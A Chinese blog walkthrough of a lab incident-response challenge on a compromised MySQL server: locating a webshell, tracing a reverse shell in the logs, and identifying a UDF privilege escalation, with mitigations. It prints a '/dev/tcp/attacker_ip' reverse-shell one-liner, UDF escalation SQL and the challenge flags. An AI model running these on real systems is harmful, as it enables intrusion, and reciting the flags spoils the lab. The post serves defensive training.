【玄机】第二章日志分析-mysql应急响应

于 2025-03-03 12:50:31 发布
阅读量1.6k 收藏 33
点赞数 45
文章标签: mysql android 数据库 系统安全 安全性测试 网络安全应急响应
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ywx05_/article/details/145981577
版权

第一题

看到shell就想到可疑函数

可疑函数调用
WebShell 通常会使用一些危险的函数来执行系统命令或代码,如:

PHP: eval(), system(), exec(), shell_exec(), passthru(), assert(), base64_decode()

ASP: Execute(), Eval(), CreateObject()

JSP: Runtime.getRuntime().exec()

编码和解码
WebShell 经常使用编码和解码技术来隐藏其真实意图,如 Base64 编码:

示例: eval(base64_decode('encoded_string'));

文件操作
WebShell 可能会包含文件操作函数,用于读取、写入或修改文件:

PHP: fopen(), fwrite(), file_get_contents(), file_put_contents()

ASP: FileSystemObject

网络操作
WebShell 可能会包含网络操作函数,用于与远程服务器通信:

PHP: fsockopen(), curl_exec(), file_get_contents('http://...')

ASP: WinHttp.WinHttpRequest

定位可疑文件
我们可以尝试定位一些特殊的后缀文件,例如:.asp, .php, .jsp, .aspx。

命令列如:

find ./ -type f -name "*.jsp" | xargs grep "exec("
find ./ -type f -name "*.php" | xargs grep "eval("
find ./ -type f -name "*.asp" | xargs grep "execute("
find ./ -type f -name "*.aspx" | xargs grep "eval("

我们一个一个试就好了

我们过去看一下

 看到了第一题的flag

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

第二题 

解题思路

让我们找出黑客反整shell的p是什么。那我们先简单了解一下反整shell的原理,反整shell(Reverse Shell)的原理是攻击者通过在目标系统上运行恶意代码,使得目标系统主动与攻击者的控制服务器建立连接,从而通过防火墙和其他安全措施。

反整shell的工作原理

  1. 攻击者准备监听: 攻击者在其控制的服务器上启动一个监听程序(通常是一个Netcat或类似工具),等待目标系统主动连接。

    nc -lvp 4444

    这里,-l表示监听模式,-v表示冗长输出,-p指定端口。

  2. 目标系统执行恶意代码: 攻击者通过漏洞利用、社交工程等手段,在目标系统上执行恶意代码。这段代码会打开一个shell,并尝试连接攻击者的服务器。

    /bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1

    这个命令的作用是通过TCP端口连接攻击者的IP地址和端口,并将输入和输出重定向到这个连接上。

  3. 建立连接: 目标系统主动向攻击者的服务器发起连接请求,由于是目标系统主动连接,一般不会被防火墙阻拦。

  4. 攻击者获得Shell访问: 一旦连接建立,攻击者就可以在其控制服务器上得到一个远程Shell,能够像在本地终端一样执行命令,控制目标系统。

到这里要找出黑客反整的shell,我们可以通过查看日志进行分析:

基本步骤:

  • 检查日志文件: 查看MySQL的日志文件,特别是查询日志和错误日志。这些日志可以提供关于执行的查询和任何异常情况的信息。

  • 查询日志: 记录所有的查询,包括成功和失败的查询。

  • 错误日志: 记录MySQL服务器的错误、警告和通知。

这些日志通常位于 /var/log/mysql/ 目录下。

  • 检查审计日志: 如果启用了审计操作,可以查看审计日志。MySQL Enterprise Edition包含一个审计操作,可以记录所有SQL查询。

  • 检查连接历史: 检查MySQL中的连接历史,找出哪些IP地址连接过数据库,可以通过查询 information_schema.processlist 或 performance_schema 来获取连接信息。

  • 检查特定的表和列: 查找数据库中是否有存储和执行恶意命令的痕迹,例如 system 或 exec 等。

我们到mysql的日志去看看

 

看到一条比较可疑的信息

这段日志显示有人尝试在MySQL服务器上执行位于 /tmp/1.sh 的 shell 脚本。然而,该脚本的内容似乎并非有效的 shell 命令或脚本格式,而是类似于 HTTP 响应或下载日志的内容。日志中的每一行错误信息(如 command not found)表明,脚本的每一行都被 shell 解释器当作命令来执行。由于这些行实际上是 HTTP 响应的一部分(例如日期、状态信息、长度描述等),shell 无法识别并执行它们,从而导致了一系列错误。

用find命令定位一下

find / -name '1.sh'

看到两个地方都有

我们直接进去看一下

第二题的答案有了

flag{192.168.100.13}

 第三题

这里直接猜测是udf提权

要提权看到要先登录到mysql,那么肯定就有泄露密码,做过web题目的都知道在页面下泄露的

我们直接用命令定位过去

find  /var/www/html | xargs grep "root"

我们试着登录一下看看

看来没错

 简单查看一下mysql的配置,确定是否有提权

show global variables like '%secure%';

show global variables like '%secure%'; 是一条 MySQL 查询命令,用于显示与 “secure” 相关的全局变量及其当前设置。通过查看这些变量的配置,可以帮助我们了解 MySQL 服务器的安全性设置和限制。

secure_file_priv 变量为空意味着 MySQL 没有对文件操作进行限制。这就是黑客利用进行 UDF (User Defined Functions) 提权,因为他们可以将任意的共享库文件(例如 .so 文件)上传到服务器并通过 MySQL 加载执行

我们进入到mysql存放用户自定义函数目录下

将路径进行md5加密

得到第三题的答案

flag{B1818BDE4E310F3D23F1005185B973E7}

第四题

UDF提权的基本原理

  1. UDF简介:UDF允许用户编写自定义函数并在SQL查询中使用。这些函数通常是用C或C++编写的,并编译为共享库(如.so文件在Linux上,或.dll文件在Windows上)。

  2. 提权过程

    • 上传恶意共享库:攻击者首先需要将恶意的共享库文件上传到目标服务器的某个目录中。这个文件包含攻击者希望执行的代码。

    • 创建UDF:攻击者使用SQL命令在数据库中创建UDF,并指定使用上传的共享库。

    • 执行恶意代码:一旦UDF创建成功,攻击者可以通过调用这个函数来执行恶意代码,从而提升权限或执行其他操作。
       

 

UDF 提权攻击步骤

  1. 编写恶意 UDF 插件:攻击者编写一个包含恶意代码的共享库文件(如 .so 文件)。

  2. 上传恶意插件:利用 MySQL 的文件操作功能将恶意共享库文件上传到服务器上的某个路径。

    SELECT '' INTO OUTFILE '/path/to/your/udf.so';

  3. 创建 UDF 函数:使用 CREATE FUNCTION 命令将上传的共享库文件加载为 MySQL 的 UDF 函数。

    CREATE FUNCTION do_system RETURNS INTEGER SONAME 'udf.so';

  4. 执行命令:调用创建的 UDF 函数来执行系统命令。

    SELECT do_system('id');

检查和防护措施

  1. 检查 UDF 函数:查看是否存在异常的 UDF 函数。

    SELECT * FROM mysql.func;

  2. 限制 secure_file_priv:将 secure_file_priv 设置为一个特定的路径,限制 MySQL 文件操作的范围。

    secure_file_priv = /var/lib/mysql-files

  3. 移除不需要的 UDF 函数:删除所有可疑的 UDF 函数。

    DROP FUNCTION IF EXISTS do_system;

  4. 权限控制:严格控制数据库用户的权限,避免赋予不必要的权限,特别是文件操作和创建函数的权限。

  5. 日志监控:定期检查 MySQL 日志文件,关注异常的文件操作和函数创建活动。

我们到mysql里面检查一下

SELECT * FROM mysql.func;

 检查 mysql.func 表中是否有异常的 UDF 函数

那么我们直接查一下whoami的值

select sys_eval('whoami');

 

攻击步骤总结

  1. 编写恶意 UDF 插件:攻击者编写包含恶意代码的共享库文件。

  2. 上传恶意插件:利用 MySQL 的文件操作功能将恶意文件上传到服务器。

  3. 创建 UDF 函数:使用 CREATE FUNCTION 命令将共享库文件加载为 UDF 函数。

  4. 执行命令:调用 UDF 函数执行系统命令,提升权限或执行其他恶意操作。

防护措施总结

  1. 检查 UDF 函数:定期检查 MySQL 中的 UDF 函数,确保没有异常函数存在。

    sql

    复制

    SELECT * FROM mysql.func;

  2. 限制 secure_file_priv:通过设置 secure_file_priv 参数,限制 MySQL 文件操作的范围,防止攻击者上传恶意文件。

    ini

    复制

    [mysqld]
secure_file_priv = /var/lib/mysql-files

  3. 移除不需要的 UDF 函数:删除所有可疑的 UDF 函数,防止被利用。

    sql

    复制

    DROP FUNCTION IF EXISTS do_system;

  4. 权限控制:严格控制数据库用户的权限,避免赋予不必要的权限,特别是文件操作和创建函数的权限。

  5. 日志监控:定期检查 MySQL 日志文件,关注异常的文件操作和函数创建活动,及时发现并应对潜在的安全威胁。

我们就得到了第四题的答案

flag{mysql}

 

ioayl
关注
玄机靶场 第二章日志分析-mysql应急响应
qq_46343633的博客
06-05 1499
1.黑客第一次写入的shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
玄机-第二章-日志分析-MySQL应急响应
lin__ying的博客
08-04 342
find ./ -name "*.php" | xargs grep "@eval(" #在当前目录下查找@eval字符串。黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx。#搜索当前目录及其子目录下所有 .php 文件中的 "root" 字符串,并输出包含该字符串的行。cd /var/log/mysql 切换到linux系统中的日志目录的MySQL目录下。#列出MySQL服务器级别的全局系统变量,与“secure”相关的所有变量。
玄机靶场】第二章日志分析-mysql应急响应
yujiahui0203的博客
05-20 2694
mysql应急响应 ssh账号 root 密码 xjmysql1.黑客第一次写入的shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
玄机-第二章日志分析-mysql应急响应
JACKBREAK的博客
05-19 1718
玄机应急响应靶场日记
玄机应急响应-Linux日志分析
qq_40923603的博客
02-23 4927
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割。2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割。3.爆破用户名字典是什么?如果有多个使用","分割。5.黑客登陆主机后新建了一个后门用户,用户名是多少。4.登陆成功的IP共爆破了多少次。
第二章日志分析-mysql应急响应
SS_liang的博客
07-24 1062
MySQL应急响应是指在MySQL数据库遇到故障、入侵或其他紧急情况时,采取的一系列快速、有效的措施,以确保数据库的完整性、安全性和可用性,这里我们主要分析的是日志信息,里面记录黑客入侵的大部份信息。
玄机——第二章日志分析-mysql应急响应 wp
焦虑的焦虑
06-30 3124
第二章日志分析-mysql应急响应
应急响应实战笔记02日志分析篇(5)
qq_59468567的博客
02-19 1168
在利用SQL注入漏洞的过程中,我们会尝试利用sqlmap的--os-shell参数取得shell,如操作不慎,可能留下一些sqlmap创建的临时表和自定义函数。这个差别在于,不同的数据库连接工具,它在连接数据库初始化的过程中是不同的。通过这样的差别,我们可以简单判断出用户是通过连接数据库的方式。我们来做个简单的测试吧,使用我以前自己开发的弱口令工具来扫一下,字典设置比较小,2个用户,4个密码,共8组。另外,不管你是爆破工具、Navicat for MySQL、还是命令行,登录失败都是一样的记录。
数据库应急预案
06-27
数据库应急预案数据库应急预案数据库应急预案数据库应急预案
数据库MySQL的应急处理
开着奥迪卖小猪
04-11 1745
数据库CPU使用率过高 通过监控面板确认数据库qps是否有突增,如果突增,则进行qps突增应急预案处理 查看数据库慢sql,如果存在大量慢sql,则启动慢sql应急预案处理 qps突增应急预案 查看数据库当前的大量的qps来自于哪里 通过sql定位到这些请求来自于哪个服务 能否定位到服务对应的接口,如果能则限流该接口,如果不能则限流整个应用。 慢sql的应急预案 查看数据库当前慢sql 通过慢sql定位到对应应用 能否定位到服务对应的接口,如果能则限流该接口,如果不能则限流整个应用。 ...
应急响应事件处置指南_cop(2),极其重要
m0_61041374的博客
04-09 305
对于列表中的每个端口,还显示打开该端口的进程的信息,包括进程名称、进程的完整路径、进程的版本信息(产品名称、文件描述等)、进程的创建时间以及创建该进程的用户。通过系统的异常排查定位到恶意程序文件,但仅通过系统层面排查无法确认恶意程序外连信息及操作行为时,则需要使用更为专业的监控工具对恶意程序进一步分析,必要时需要使用反汇编工具对恶意程序进行逆向分析,从而获取恶意程序的操作行为,分析其造成的影响,甚至可以获取到定位攻击者身份的关键信息。这里下面的数字和字母组合的子键是你计算机中所有用户帐户的SAM项。
玄机应急:Apache日志分析&Mysql应急&Redis应急
8888的博客
11-30 1290
Linux系统中,这些日志文件通常存储在/var/log/apache2/或/var/log/httpd/目录下‌,管理员可以使用cat、tail、grep、awk等命令行工具查看和分析日志内容,以了解服务器运行状态、客户端访问情况及排查问题‌,同时,Apache的配置文件中也包含了日志文件的位置信息,可通过查看配置文件找到日志文件的确切路径‌。在这个上下文中,它会对提取出的IP地址进行排序,但由于我们实际上只关心一个特定的IP地址,这个排序步骤可能是多余的。通常,对IP地址排序需要更复杂的处理。
应急响应事件处置指南_cop(3),2024网络安全开发社招面试总结+解答分享
m0_61041374的博客
04-09 317
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
玄机靶场 - 第二章 日志分析-mysql应急响应
fishfishfishman的博客
08-15 624
黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx。插件,该插件通常用于MySQL的UDF提权,可以判断黑客使用的也正是UDF提权。导出日志文件,可以看到请求参数里面有很多SQL语句,可以判断是SQL注入攻击。在日志的最后,可以看到用恶意函数执行了一段Base64加密的代码。,后者查看内容是黑客创建提权后门,这样就获取到了完整提权文件路径。就是黑客上传的Webshell,里面的内容是一句话木马。由于黑客使用的是插件提权,我们找到数据库的插件目录。
Mysql应急处理
lianggx3的博客
05-02 504
短连接过多 处理掉那些占着连接但是不工作的线程。 在show processlist的结果里,踢掉显示为sleep的线程 图中id=4和id=5的两个会话都是Sleep 状态。而要看事务具体状态的话,你可以查information_schema库的innodb_trx表。 trx_mysql_thread_id=4,表示id=4的线程还处在事务中。优先断开事务外空闲太久的连接。 减少连接过程的消耗 使用–skip-grant-tables参数启动。这样,整个MySQL会跳过所有的权限..
线上Mysql重大事故快速应急解决办法
weixin_34238633的博客
11-19 1417
由于好多公司节约成本都没有自己的DBA人员,大部分都是开发或者运维人员操作数据库,但数据库是重中之重,等公司达到一定规模之后,数据库一个不小心的事故,很有可能会让公司回到解放前。所以在公司小规模的时候就应该有一套自己的数据库体系以及完善的数据库架构,操作人员的重点在优化和提升性能,而不是再去修改数据库的整体架构。下面我给大家总结了三种数据库事故和解决办法一边操作人员应急使用。请做类比参考,错误类型...
玄机第二章mysql环境怎么连接
最新发布
03-26
<think>好的,我现在需要帮用户解决如何在特定环境下配置和连接到MySQL数据库的问题。用户提到了环境设置教程,所以首先我得整理不同编程语言或工具下的配置步骤。 首先,用户提供的引用资料里有Python、PHPstudy、Matlab的例子,还有MySQL的一般安装步骤。可能需要分点说明不同环境下的配置方法,比如Python需要安装mysql-connector-python,PHPstudy自带MySQL可能路径配置,Matlab需要JDBC驱动等。 然后,我得确保每个步骤都清晰,比如安装驱动、配置环境变量、连接代码示例。同时,用户可能需要具体的代码示例,所以得包括Python和Matlab的连接代码,以及如何验证连接是否成功。 另外,用户可能关心常见问题,比如驱动安装失败、连接错误,这些需要包含在注意事项里。还要检查引用是否正确,比如引用[1]到[4]对应的内容是否准确,比如Python连接部分引用[1],环境变量配置引用[2]和[3],Matlab配置引用[4]等。 需要注意使用正确的LaTeX格式,比如行内公式用$...$,但这里可能用不上数学公式,不过要确保代码块正确。另外,生成相关问题时要围绕数据库连接的不同方面,比如驱动安装、不同语言连接、错误处理等。 最后,确保回答结构清晰,分步骤讲解,引用正确,并且语言简洁易懂。可能还需要检查是否有遗漏的环境配置步骤,比如PHPstudy的部分是否需要详细说明,但根据用户的问题,可能重点在Python和Matlab,但引用里也有PHPstudy的内容,可能需要简要提到。</think>### 如何配置和连接到 MySQL 数据库 #### 1. 环境准备 - **安装 MySQL 数据库** 从[MySQL官网](https://dev.mysql.com/downloads/)下载对应操作系统的安装包,按照指引完成安装。安装后需记录以下信息: - 数据库地址(如 `localhost` 或远程 IP) - 端口号(默认 `3306`) - 用户名和密码(安装时设置) - 数据库名称(需提前创建或连接后创建) - **配置环境变量(可选)** 若需在命令行直接使用 MySQL 工具,需将 MySQL 的 `bin` 目录添加到系统环境变量。例如: ```bash # Windows 路径示例 C:\Program Files\MySQL\MySQL Server 8.0\bin ``` 添加后可在命令行直接运行 `mysql -u root -p` 连接数据库[^2][^3]。 --- #### 2. 编程语言连接示例 ##### **Python 连接 MySQL** 1. **安装驱动** 使用 `pip` 安装 `mysql-connector-python`: ```bash pip install mysql-connector-python ``` 2. **连接代码** ```python import mysql.connector config = { "host": "localhost", "user": "root", "password": "your_password", "database": "test_db" } try: conn = mysql.connector.connect(**config) cursor = conn.cursor() cursor.execute("SELECT VERSION()") print("MySQL 版本:", cursor.fetchone()[0]) except Exception as e: print("连接失败:", e) finally: if conn.is_connected(): cursor.close() conn.close() ``` 引用自 Python 连接 MySQL 教程[^1]。 --- ##### **Matlab 连接 MySQL** 1. **安装 JDBC 驱动** - 下载 MySQL JDBC 驱动(如 `mysql-connector-java-8.0.xx.jar`)。 - 将驱动文件放置于 Matlab 的 Java 库路径(如 `matlabroot/java/jar`)。 2. **配置数据库连接** ```matlab % 设置连接参数 jdbcUrl = 'jdbc:mysql://localhost:3306/test_db'; username = 'root'; password = 'your_password'; % 建立连接 conn = database('test_db', username, password, 'com.mysql.jdbc.Driver', jdbcUrl); if isconnection(conn) disp('连接成功'); % 执行 SQL 查询 data = fetch(conn, 'SELECT * FROM your_table'); else disp('连接失败'); end close(conn); ``` 引用自 Matlab 连接 MySQL 教程[^4]。 --- ##### **PHPstudy 连接 MySQL** 1. **使用内置 MySQL** PHPstudy 默认集成 MySQL,可直接通过命令行或工具(如 Navicat)连接: ```bash mysql -u root -p -h 127.0.0.1 -P 3306 ``` 密码默认为 `root`,路径配置可参考 PHPstudy 文档。 --- #### 3. 常见问题与验证 - **连接失败检查项**: - 确认 MySQL 服务已启动(Windows:服务管理;Linux:`systemctl status mysql`)。 - 检查防火墙是否放行 `3306` 端口。 - 验证用户名和密码是否正确。 - **测试连接**: 使用命令行工具或编程语言执行简单查询(如 `SELECT VERSION()`)确认连通性。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值